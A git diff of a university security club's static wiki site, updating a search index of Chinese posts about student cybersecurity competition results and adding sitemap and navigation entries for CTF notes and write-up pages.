X-NUCA\u8054\u8d5b\u9762\u5411\u5168\u56fd\u5728\u6821\u5b66\u751f\uff0c\u5305\u62ec\u4e13\u79d1\u751f\u3001\u672c\u79d1\u751f\u3001\u7855\u58eb\u751f\u548c\u535a\u58eb\u751f\uff0c\u9700\u7531\u6307\u5bfc\u8001\u5e08\u5e26\u961f\u53c2\u8d5b\u30022017\u8d5b\u5b63\u5206\u4e3a\u4e13\u9898\u8d5b\u548c\u603b\u51b3\u8d5b\u4e24\u4e2a\u9636\u6bb5\uff0c\u9996\u6b21\u4e13\u9898\u8d5b2017\u5e748\u670826\u65e5\u4e3e\u529e\u3002\u4e13\u9898\u8d5b\u5305\u542b3\u671f\u7ebf\u4e0a\u8d5b\uff0c\u5206\u522b\u57288\u670826\u65e5\u300110\u67088\u65e5\u300111\u670825\u65e5\u4e3e\u529e\uff0c12\u6708\u4e3e\u529e\u603b\u51b3\u8d5b\u5e76\u9881\u5956\u3002 X-NUCA\u8054\u8d5b\u63a8\u51fa\u7684\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\u901a\u8fc7\u5f15\u5165\u8d5b\u524d\u6307\u5bfc\u548c\u8d5b\u540e\u4ea4\u6d41\u73af\u8282\uff0c\u4f7f\u53c2\u8d5b\u9009\u624b\u4e0d\u4ec5\u53ef\u4ee5\u6bd4\u8d5b\uff0c\u8fd8\u53ef\u4ee5\u6709\u9488\u5bf9\u6027\u7684\u5b66\u4e60\u3002\u5728\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\u4e2d\uff0c\u6bd4\u8d5b\u961f\u4f0d\u5e38\u89c4\u5316\u3001\u6bd4\u8d5b\u6d3b\u52a8\u5e38\u89c4\u5316\uff0c\u7c7b\u4f3c\u4e8e\u201cNBA\u201d\u6a21\u5f0f\u3002\u5728\u8fd9\u79cd\u6a21\u5f0f\u4e0b\uff0c\u53c2\u8d5b\u961f\u4f0d\u8363\u8a89\u611f\u66f4\u5f3a\uff0c\u4eba\u624d\u7684\u5f52\u5c5e\u611f\u66f4\u5f3a\uff0c\u66f4\u5bb9\u6613\u548c\u9ad8\u6821\u6b63\u89c4\u7684\u4eba\u624d\u57f9\u517b\u4f53\u7cfb\u76f8\u7ed3\u5408\u3002X-NUCA\u8054\u8d5b\u529b\u56fe\u5c06\u7ade\u8d5b\u5e73\u53f0\u3001\u5b66\u4e60\u5e73\u53f0\u3001\u4ea4\u6d41\u5e73\u53f0\u548c\u53c2\u8d5b\u56e2\u961f\u56db\u8005\u7d27\u5bc6\u8fde\u63a5\uff0c\u52aa\u529b\u843d\u5b9e\u201c\u5bd3\u5b66\u4e8e\u8d5b\uff0c\u4ee5\u8d5b\u4fc3\u5b66\u201d\u7684\u7406\u5ff5\uff0c\u65e8\u5728\u4fc3\u8fdb\u4e2d\u56fd\u9ad8\u6821\u7f51\u5b89\u6559\u5b66\u6c34\u5e73\u7684\u63d0\u9ad8\u548c\u7f51\u5b89\u4eba\u624d\u7684\u53d1\u73b0\u3002

    \u6211\u4eec\u534f\u4f1a\u7684CodeMonster\u6218\u961f\u9996\u6b21\u53c2\u52a0\u672c\u6b21\u6bd4\u8d5b\uff0c\u53d6\u5f97\u4e86\u7ebf\u4e0a\u8d5b\u5168\u56fd\u7b2c9\u540d\u7684\u6210\u7ee9\u3002

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/dfd03705-8ad1-420f-8534-0fd4086165e7/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"

    \u6bd4\u8d5b\u671f\u95f4\u622a\u56fe,\u4e00\u5ea6\u5360\u9886\u699c\u4e00\uff1a

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/f72cbee7-1294-46b9-92e3-49a3140255b2/","title":"2017 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u4f01\u4e1a\u8d5b\u534e\u5357\u8d5b\u533a \u4e09\u7b49\u5956\uff08\u7b2c3\u540d\uff09","text":"

    \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u662f\u4e00\u9879\u9762\u5411\u5927\u5b66\u751f\u7684\u516c\u76ca\u6027\u79d1\u6280\u7c7b\u7ade\u8d5b\uff0c\u7531\u4e2d\u56fd\u4fe1\u606f\u4ea7\u4e1a\u5546\u4f1a\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u5206\u4f1a\u53d1\u8d77\u4e3b\u529e\uff0c\u901a\u8fc7\u6574\u5408\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u8d44\u6e90\u5bf9\u63a5\u9ad8\u6821\uff0c\u4e3a\u5927\u5b66\u751f\u63d0\u4f9b\u4e00\u4e2a\u8fdb\u884c\u4fe1\u606f\u5b89\u5168\u6280\u672f\u521b\u65b0\u3001\u6df1\u5165\u4ea7\u4e1a\u884c\u4e1a\u5e94\u7528\u4ee5\u53ca\u6269\u5c55\u5b89\u5168\u89c6\u91ce\u7684\u5e73\u53f0\uff0c\u63a8\u52a8\u6821\u4f01\u5408\u4f5c\u6a21\u5f0f\u7684\u4fe1\u606f\u5b89\u5168\u4eba\u624d\u57f9\u517b\uff0c\u4ece\u800c\u5b9e\u73b0\u4fe1\u606f\u5b89\u5168\u4f18\u79c0\u4eba\u624d\u7684\u57f9\u517b\u548c\u9009\u62e8\u6e20\u9053\u3002

    \u5927\u8d5b\u5f3a\u8c03\u8d34\u8fd1\u5b9e\u6218\uff0c\u4ee5\u4fe1\u606f\u5b89\u5168\u5178\u578b\u884c\u4e1a\u5e94\u7528\u573a\u666f\u4e3a\u5927\u8d5b\u73af\u5883\uff0c\u91cd\u70b9\u68c0\u9a8c\u53c2\u8d5b\u5b66\u751f\u9762\u5bf9\u771f\u5b9e\u73af\u5883\u4e0b\u7684\u4fe1\u606f\u5b89\u5168\u5de5\u7a0b\u80fd\u529b\u548c\u653b\u9632\u6280\u672f\u80fd\u529b\u3002

    \u5927\u8d5b\u5f3a\u8c03\u4f01\u4e1a\u4e0e\u9ad8\u6821\u7684\u8054\u5408\uff0c\u901a\u8fc7\u6821\u4f01\u5bf9\u63a5\u7684\u4f01\u4e1a\u5bfc\u5e08\u52a0\u5b66\u751f\u6218\u961f\u7684\u6a21\u5f0f\uff0c\u5c06\u4f01\u4e1a\u8d44\u6e90\u7eb3\u5165\u5230\u9ad8\u6821\u7684\u4fe1\u606f\u5b89\u5168\u76f8\u5173\u4e13\u4e1a\u4eba\u624d\u57f9\u517b\u4e2d\uff0c\u5e76\u5b9e\u73b0\u4eba\u624d\u4ece\u9ad8\u6821\u5230\u4f01\u4e1a\u7684\u65e0\u7f1d\u5bf9\u63a5\u3002

    \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u4e3a\u4e00\u9879\u5468\u671f\u4e3a\u4e00\u5e74\u7684\u5168\u56fd\u6027\u8054\u8d5b\u8d5b\u4e8b\uff0c\u7531\u591a\u4e2a\u533a\u57df\u5206\u7ad9\u8d5b\u548c\u5e74\u5ea6\u603b\u51b3\u8d5b\u7ec4\u6210\u3002

    \u672c\u534f\u4f1a\u7684CodeMonster\u6218\u961f\u8363\u83b7\u7b2c\u4e09\u540d\uff0c\u62ff\u4e0b\u4e09\u7b49\u59565000\u5143\u5956\u91d1\u3002

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/f72cbee7-1294-46b9-92e3-49a3140255b2/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"

    \u83b7\u5956\u56fe\u7247\uff1a

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"writeup/CISCN-CTF-Quals-2023/","title":"2023\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521d\u8d5bWriteup","text":"

    11

    "}]} \ No newline at end of file diff --git a/sitemap.xml b/sitemap.xml index 28b4288..4528a9c 100755 --- a/sitemap.xml +++ b/sitemap.xml @@ -2,92 +2,232 @@ https://wiki.xmutsec.cn/ - 2023-08-07 + 2023-08-15 daily https://wiki.xmutsec.cn/award/ - 2023-08-07 + 2023-08-15 daily https://wiki.xmutsec.cn/member/ - 2023-08-07 + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/CTF-CPYPTO-2/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/CTF-CRYPTO-1/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/CTF-CRYPTO-3/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/CTF-CRYPTO-4/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/CTF-CRYPTO-5/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/CTF-WEB-2/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/CTF-Web-1/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/problem-1096-wp/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/problem-1852-wp/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/problem-2026-wp/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/problem-2036-wp/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/problem-2049-wp/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/problem-2074-wp/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/problem-2076-wp/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/problem-2099-wp/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/problem-227-wp/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/problem-2422-wp/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/problem-2602-wp/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/problem-39-wp/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/problem-403-wp/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/problem-404-wp/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/problem-413-wp/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/problem-440-wp/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/problem-442-wp/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/problem-444-wp/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/problem-463-wp/ + 2023-08-15 + daily + + + https://wiki.xmutsec.cn/ctfnotes/problem-47-wp/ + 2023-08-15 daily https://wiki.xmutsec.cn/posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/ - 2023-08-07 + 2023-08-15 daily https://wiki.xmutsec.cn/posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/ - 2023-08-07 + 2023-08-15 daily https://wiki.xmutsec.cn/posts/131885e3-191c-40ac-af0d-79835e15d45b/ - 2023-08-07 + 2023-08-15 daily https://wiki.xmutsec.cn/posts/6d1aa499-57ee-401b-a911-8062c6cae869/ - 2023-08-07 + 2023-08-15 daily https://wiki.xmutsec.cn/posts/6eba13d5-1e74-4680-8a10-9c18763b6389/ - 2023-08-07 + 2023-08-15 daily https://wiki.xmutsec.cn/posts/72c8b299-29e5-4e88-a684-7c65b3931760/ - 2023-08-07 + 2023-08-15 daily https://wiki.xmutsec.cn/posts/86e69101-77f4-484a-ba0e-2957afabbdb6/ - 2023-08-07 + 2023-08-15 daily https://wiki.xmutsec.cn/posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/ - 2023-08-07 + 2023-08-15 daily https://wiki.xmutsec.cn/posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/ - 2023-08-07 + 2023-08-15 daily https://wiki.xmutsec.cn/posts/ab21d401-10e1-4021-9936-e7154fd9ed71/ - 2023-08-07 + 2023-08-15 daily https://wiki.xmutsec.cn/posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/ - 2023-08-07 + 2023-08-15 daily https://wiki.xmutsec.cn/posts/bb168e48-791c-4a1d-83c4-335b9db12499/ - 2023-08-07 + 2023-08-15 daily https://wiki.xmutsec.cn/posts/dfd03705-8ad1-420f-8534-0fd4086165e7/ - 2023-08-07 + 2023-08-15 daily https://wiki.xmutsec.cn/posts/f72cbee7-1294-46b9-92e3-49a3140255b2/ - 2023-08-07 + 2023-08-15 daily https://wiki.xmutsec.cn/writeup/CISCN-CTF-Quals-2023/ - 2023-08-07 + 2023-08-15 daily \ No newline at end of file diff --git a/sitemap.xml.gz b/sitemap.xml.gz index b0b13931bce53110d405f3e167ee3638b2be49e9..597caf8095539001747c59a747cd57347b81cdca 100755 GIT binary patch literal 785 zcmV+s1Md7EiwFoDblYSC|8r?{Wo=<_E_iKh0M(hvj@vj8hVOZbh5;YTVsU5Sc91k2 zAeWhJgCIvP#cpG~jirt=Z$G6@5cD;d0jY~5k{~{o{`!lO)~~)F_BY??GVV^t+Xb$~ z;)ag-RCdSv+r?j>--2Jf+PqjlUiKqRH$3<_-Yy=d>HKmSuGi~o+)Z?d=W%tq+z(@Z z;G1#y**J(*SZrS0@G(#DH?@xI%&oa)_?Ec=Zz8@Z^k@6}ZhxIV`J|7&%>2N9= zDWn470SyoN+4gK$eu&3=su%iaQ{ry_?|OLF@`Gadh4DK;@ft6sJ*)#A5?$Kk%2Pd_ zCK`u3me1Y$ukSzq39@y}k58D`2d3%+Q}=;s8pr&yebapYe4*5I@_hXCdbxGW*V|=q z%dK6$QOjVKTeI}s@^z?HX-@}05iDHKJ&<}M`ygcy+Y71chE#`MNS*G6 zw40|NdU^WNbponoFLr80C#0$qk!qoO0qw*}HTDuwEqVc!y@2+jQQM0~+bp5y(>RTT za5*Vm6u4{# zS@wk1llEMU=GqjofLB?AVx5PQP_p;8%3f*_$_c}+URX0yRPcs#Ra91zw`dJDyCdHvS*}#66ux Pnl}Fd%OdN&tRDaXQv8Pj literal 615 zcmV-t0+{_DiwFp4anNJ}|8r?{Wo=<_E_iKh0L_<8ZyO;HhVS_mmhaxqO{Lxb_j-6Y@=7uM#rPK>y3tts!#eOG^VlEP`7~XoL4}fytp-AI z2-Z-8+_Hvft#&d~Vzb?{w_H>!2qv)w8<-)LCL5rTbXGn#9eQO)gE2ZbfC&p&MFps- z3L!<~7+tk4_sZ@o64{i%%|~t(W}t)!QF&c_A&x$E%g&k5R0qgGG~=U!NT@_O7=t(2 zo7gRT&?ROq=dKewupA?hk5*FGOR6S=!K+@`qi3H`A%xK6+@mE)Q^m3s7pPIrHTz!K zlL))%8X;S%!Y*z})mU&gVn&W^`ps1eMvT1`P*y~5i2~$O3ly!TpM7wsyJgQBtJn*m zVyR6^Bcx0h zL{lsn(Rr#FwRnH8?6p;8f^y>ORWzejgXknzRTCvekKS>&cY-DcpP2)oPIGO_36hp8 zf=y&l;qlYg$ItL6Z;>xo+D|a^{D0b)kGy#{e*kON*a#yH007BP BEV}>z diff --git a/writeup/CISCN-CTF-Quals-2023/index.html b/writeup/CISCN-CTF-Quals-2023/index.html index 0a9cefa..c8fc8fa 100755 --- a/writeup/CISCN-CTF-Quals-2023/index.html +++ b/writeup/CISCN-CTF-Quals-2023/index.html @@ -229,6 +229,22 @@ + + + + + + + + +
  • + + CTF Notes + +
    • + + + @@ -648,6 +664,433 @@ + + + + + + + + +
  • + + + + + + + + + + + +
    • + + +